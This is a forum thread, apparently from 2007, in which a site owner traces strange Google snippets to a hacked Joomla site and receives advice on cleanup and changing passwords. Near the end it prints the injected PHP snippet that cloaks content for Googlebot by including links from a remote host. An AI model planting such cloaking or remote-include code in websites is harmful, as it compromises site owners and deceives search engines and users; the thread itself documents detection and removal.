Strange Sniplets At Google Serps, Strange sniptlets with no relation to site content Options

[robmarketshare]

Google shows strange sniptlets when one searches for the phrase :magix ringtone acclimating

I Hear you say: Why search for that query?

When checking the logs some strange search queries where found so we investigated them.
It turns out Google shows our site with some none related keywords:The phrase above shows what i mean most clearly, and for several different (non-related) websites.
In some cases the cache is not shown (or has non content) in other cases the cache is correctly shown.

What could cause this to happen ?

[qwerty]

A couple of questions: Have you checked the snippet against the site's listings in the ODP or the Yahoo directory?

When you look at the cached copy of the page after running this search, are the keywords preceded by the "These terms only appear in links pointing to this page" caveat?

[robmarketshare]

Yep, Checked DMOZ and Yahoo. They have more or les correct decriptions:)
The cache for my friends site doesn't give the "only links pointing" remark. Some of the caches of other sites with the strange sniplet do.

When searching with site:vvvvvv.theirdomain.com the sniplet shows site's URL's with the Description ( as to be expected)

Strange uhhh?

[Randy]

The symptoms almost sound like what I've seen before with 302 highjacks.

[robmarketshare]

http://forums.searchenginewatch.com/showthread.php?t=12924
Found the above discussion which seems to describe the problem quite closely.

Not complety clear to me how to correct the issue.
The site in question is the www.space----.be site

[Randy]

You're probably going to end up having to have a serious sit down chat with your hosting company. Though it could also be a Joomla hack I guess, since I'm only seeing the additional spammy stuff on your Joomla pages. There's some cloaking going on.

To see it head over to Google and do a site: type of search, including at least part of the term you're seeing the strange stuff with. What I used was site:spacexxxx.be magix

When you get that view the Cache of one of the pages. Then do a View Source. Scroll down to the bottom of the source --after the closing </html> tag and you'll see a boat load of hidden links pointing to a few different sites containing those phrases and others. Funny enough, some of those are sites are now dead, so this is probably something that's been happening for awhile.

FWIW, it appears at first glance to be a Google-only cloak.

What I'd do first is grep the domain to look for joomla files that include the domains in question, or possibly the phrases. Since you probably don't have server access to run grep, you'll have to download all of the files and then do a batch search for the word or phrase. This will attempt to rule out a Joomla hack, before you start accusing your host of doing something nefarious.

If you don't find anything, all signs will point back to whoever is hosting the site doing something very stupid. Well, technically either the host doing something purposely or the host having a server that's been hacked. Either way, it's probably time to start looking for a new host. You can give them a chance to correct it, but I wouldn't fool with it for too long. Especially if they start waffling about how all of those links ended up on your site.

You'll need to do some leg work to figure out what's actually happening. Start by looking through the Joomla files to see if anything funny is there. Then go to your host. They should be able to run a quick grep to see if there are any files that contain the text strings in question anywhere on the server. Don't be too accusatory with them at the start, cuz it would be pretty stupid for a host to do something like this if they wanted to stay in business. But on the other hand, don't hang around too long if they can't give you an answer as to how it happened and what corrective actions they've taken to make sure it doesn't happen again.

Whether or not you do change hosts, it would be wise to change all of your FTP, Joomla, database and any other passwords. Because you've most definitely been hacked. Hopefully all they did was insert a few links, because they certainly could have done a lot worse.

[robmarketshare]

Thanks We now can take our actions. See where this leads to. Keep you informed !
Thanks again.

[robmarketshare]

We found it:

CODE

if(preg_match('/googlebot/i',$_SERVER['HTTP_USER_AGENT']))
{@include('http://sub.domain.ru/links.txt');}

and removed it.
Seems somehow to be conected to their up date to Joomla 1.0.13 versie
(or perhaps 1.0.13 just closed the door for the hacker, because the code was added just before the update??)

This post has been edited by Randy: Nov 5 2007, 08:50 PM

Reason for edit: Domain removed to protect the guilty.

[Randy]

You might want to direct that question to the Joomla developers. I wouldn't assume any update fixed any specific hole if they don't say it did in the changelog.

I'd still change the Passwords, at a minimum. And keep a very close eye out for any further funny business.

If you feel like it you can even send the code snippet you had over to the boys at Google. I'm sure they'd love to track down a few of them, although it looks like they may have already done so from the very quick look I just took at the domain you referenced and the 2nd domain it referenced.

[robmarketshare]

We will be watching
Thanks again Randy